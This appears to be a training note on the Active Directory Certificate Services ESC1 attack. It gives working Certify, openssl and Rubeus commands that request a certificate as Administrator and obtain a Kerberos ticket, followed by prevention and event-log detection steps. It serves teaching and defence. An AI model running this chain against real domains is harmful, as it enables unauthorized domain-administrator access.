PKI - ESC1

Description

The Certified Pre-Owned research paper by SpectreOps highlighted Active Directory Certificate Services (AD CS) as a popular attack vector due to its common misconfigurations. Certificates are highly advantageous for attackers because:

• Certificates are valid long-term, often for a year or more.

• User password resets don’t invalidate certificates.

• Misconfigured templates allow attackers to obtain certificates for other users.

• Compromising a Certificate Authority (CA) private key enables forging "Golden Certificates."

One notable privilege escalation attack method is ESC1, which involves:

• No issuance requirements.

• Enrollable client authentication/smart card logon OID templates.

• The CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag.

Attack Execution: ESC1 Example

1. Scan for Vulnerabilities with Certify:

   .\Certify.exe find /vulnerable

   The output will identify vulnerable certificate templates. Here, UserCert is identified as vulnerable due to:

   • Accessible by all domain users.

   • Allows requester-supplied SAN (allows impersonating other users).

   • No manager approval required.

   • Supports client authentication for login.

2. Abuse the Template by requesting a certificate for the "Administrator" user:

   .\Certify.exe request /ca:PKI.eagle.local\eagle-PKI-CA /template:UserCert /altname:Administrator

   This generates a PEM-format certificate, which can be converted to PFX for compatibility with tools like Rubeus.

3. Convert PEM to PFX:

   sed -i 's/\s\s\+/\n/g' cert.pem
   openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

4. Use Rubeus to Request a TGT for the Administrator account:

   .\Rubeus.exe asktgt /domain:eagle.local /user:Administrator /certificate:cert.pfx /dc:dc1.eagle.local /ptt

   Successful authentication as the Administrator will allow access to resources on DC1, such as listing contents of \\dc1\c$.

Prevention

Preventing the ESC1 attack involves:

• Disabling CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in certificate templates.

• Enforcing CA certificate manager approval for certificate issuance to ensure only legitimate requests are approved.

Regular PKI environment scans with Certify or similar tools are recommended to identify and mitigate PKI misconfigurations.

Detection

1. Event IDs 4886 and 4887: AD logs events for certificate requests (4886) and certificate issuance (4887). These logs indicate certificate issuance activity but do not specify SAN values.

2. Listing Issued Certificates: Checking the CA’s issued certificate list can reveal certificates issued with the vulnerable template, although SAN details require manual review.

3. Event ID 4768: Logs the TGT request when the certificate is used for authentication.

To automate detection, use certutil:

certutil -view

Example to find logs programmatically:

$events = Get-WinEvent -FilterHashtable @{Logname='Security'; ID='4886'}
$events[0] | Format-List -Property *

Remote Session Monitoring

If direct GUI access is unavailable, use PSSession to access the PKI machine and query for certificate issuance events:

New-PSSession -ComputerName PKI
Enter-PSSession -ComputerName PKI
Get-WinEvent -FilterHashtable @{Logname='Security'; ID='4886'}
Get-WinEvent -FilterHashtable @{Logname='Security'; ID='4887'}

---

Note: Monitoring and auditing PKI activities for unauthorized certificate issuance is critical to maintaining a secure AD CS environment.